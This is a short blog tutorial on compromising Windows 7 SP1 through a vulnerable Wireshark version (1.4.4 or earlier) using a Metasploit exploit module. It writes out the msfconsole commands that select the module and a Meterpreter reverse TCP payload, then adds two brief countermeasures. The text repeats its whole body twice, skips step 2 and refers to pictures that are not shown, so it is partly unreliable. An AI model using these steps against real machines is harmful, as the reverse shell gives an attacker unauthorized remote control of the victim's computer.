Hacking Windows 7 SP1 in 5 Steps via Wireshark Using Metasploit + Backtrack 5 R1
Victim O.S
Windows 7 SP1
Vulnerable Application
Wireshark <= 1.4.4
What is Wireshark?
According to wikipedia, Wireshark is :
a free and open-source packet analyzer.
It is used for network troubleshooting, analysis, software and communications protocol development, and education.
Originally named Ethereal, in May 2006 the project was renamed Wireshark due to trademark issues.
For hacking purpose, this tool usually used to capture the packet (TCP/UDP) that came accross wired network or wireless network.
Requirements :
1. Metasploit Framework
2. Operating System
Step By Step :
1. open your metasploit by typing msfconsole and use wireshark_packet_dect exploit.
use exploit/windows/misc/wireshark_packet_dect
set payload windows/meterpreter/reverse_tcp
3. To view the available options for this exploit, just run show options command from your msf console. In the following picture I'm just set up the important switch that need to set up to perform this attack.
4. Before running the exploit command, let say that the attacker now still collecting data using their Wireshark tool.
5. Now run the exploit command.
NOTE :
This attack doesn't always success 100%, if there's no one using their wireshark to capture data in a network then your exploit will return error message.
Countermeasures :
1. Update your Wireshark to the latest version.
2. Use tunneling or encryption to protect your data.
What is Wireshark?
According to wikipedia, Wireshark is :
a free and open-source packet analyzer.
It is used for network troubleshooting, analysis, software and communications protocol development, and education.
Originally named Ethereal, in May 2006 the project was renamed Wireshark due to trademark issues.
For hacking purpose, this tool usually used to capture the packet (TCP/UDP) that came accross wired network or wireless network.
Requirements :
1. Metasploit Framework
2. Operating System
Step By Step :
1. open your metasploit by typing msfconsole and use wireshark_packet_dect exploit.
use exploit/windows/misc/wireshark_packet_dect
set payload windows/meterpreter/reverse_tcp
3. To view the available options for this exploit, just run show options command from your msf console. In the following picture I'm just set up the important switch that need to set up to perform this attack.
4. Before running the exploit command, let say that the attacker now still collecting data using their Wireshark tool.
5. Now run the exploit command.
NOTE :
This attack doesn't always success 100%, if there's no one using their wireshark to capture data in a network then your exploit will return error message.
Countermeasures :
1. Update your Wireshark to the latest version.
2. Use tunneling or encryption to protect your data.
No comments:
Post a Comment